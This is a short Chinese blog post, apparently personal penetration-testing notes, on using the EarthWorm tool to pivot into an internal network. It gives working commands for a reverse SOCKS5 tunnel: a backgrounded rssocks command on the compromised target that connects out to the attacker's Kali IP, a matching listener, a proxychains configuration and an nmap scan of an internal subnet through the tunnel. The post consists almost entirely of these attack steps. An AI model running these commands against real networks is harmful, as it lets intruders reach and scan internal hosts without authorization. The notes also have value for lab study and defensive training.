ew

发布于 2022-04-09  81 次阅读


  1. 路由转发只能将msfconsole带进内网,而要想将攻击机上的其他攻击程序也带进内网还 需要搭建socks代理。.earthworm搭建socks5反向代理服务 是为了让kali(攻击者) 的程序进入内网,可以扫描内网主机信息等
  2. 靶机设置
    nohup ./ew_for_linux64 -s rssocks -d 192.168.1.128 -e 1234 &
    #192.168.1.128 是攻击者kali的IP地址
  3. kali设置
    ./ew_for_linux64 -s rcsocks -l 1080 -e 1234
    #将1080端口监听到的本地数据转发到 web服务器的1234端口
    # 通过1080端口,将本地流量转发出去
    #rcsocks、rssocks 用于反向连接
    #ssocks 用于正向连接
    # -l 指定本地监听的端口
    # -e 指定要反弹到的机器端口
    # -d 指定要反弹到机器的IP
    # -f 指定要主动连接的机器 ip
    # -g 指定要主动连接的机器端口
    # -t 指定超时时长,默认为 1000

    vim /etc/proxychains4.conf
    socks5 127.0.0.1 1080
  4. 需要代理的攻击加上proxychains4即可
    proxychains4 nmap -Pn 192.168.1.1/24
子夜不哭
最后更新于 2022-04-09